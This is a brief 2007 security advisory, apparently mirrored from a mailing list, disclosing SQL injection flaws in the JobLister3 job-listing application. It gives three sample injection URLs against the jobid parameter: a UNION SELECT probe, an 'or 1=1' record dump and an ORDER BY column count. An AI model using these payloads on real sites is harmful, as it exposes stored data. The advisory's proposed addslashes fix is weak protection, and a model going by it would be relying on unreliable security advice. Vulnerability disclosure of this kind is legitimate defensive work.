Security Advisory: JobLister3 SQL injection vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  DeskPRO Admin Panel Multiple HTML Injections
  PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)
  eXV2.de Browser Cookie is not properly sanitised
  Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability

From: joseph.giron13_(at)_gmail.com <joseph.giron13_(at)_gmail.com>
Date: 14.08.2007
Subject: JobLister3 SQL injection vulnerabilities

JobLister3 by SkilMatch Staffing Systems, Inc.
Multiple SQL injection vulnerabilities

http://www.dubdubdub.com/

http://www.skilmatch.com/

The search form filed doesnt strip special characters that have special

meanings. A single quote makes the application spit out a number of

errors.

This is not limited to the search query. The GET'd variables also fail to

sanatize characters.
Union selection:
www.example.com/index.
php?mode=showbyID&jobid=99786'%20union%20all%20sele

ct%20something%20from%20something/*

Dump of entries:
www.example.com/index.
php?mode=showbyID&jobid=99786'%20or%201=1/*

Using some old fasioned order by work, wee deduce 16 columns
www.example.com/index.
php?mode=showbyID&jobid=99786'%20order%20by%2016/*

Thus, the fix currently would be to impletement addslashes functions to

all areas that recieve (or can recieve) user supplied data.

test server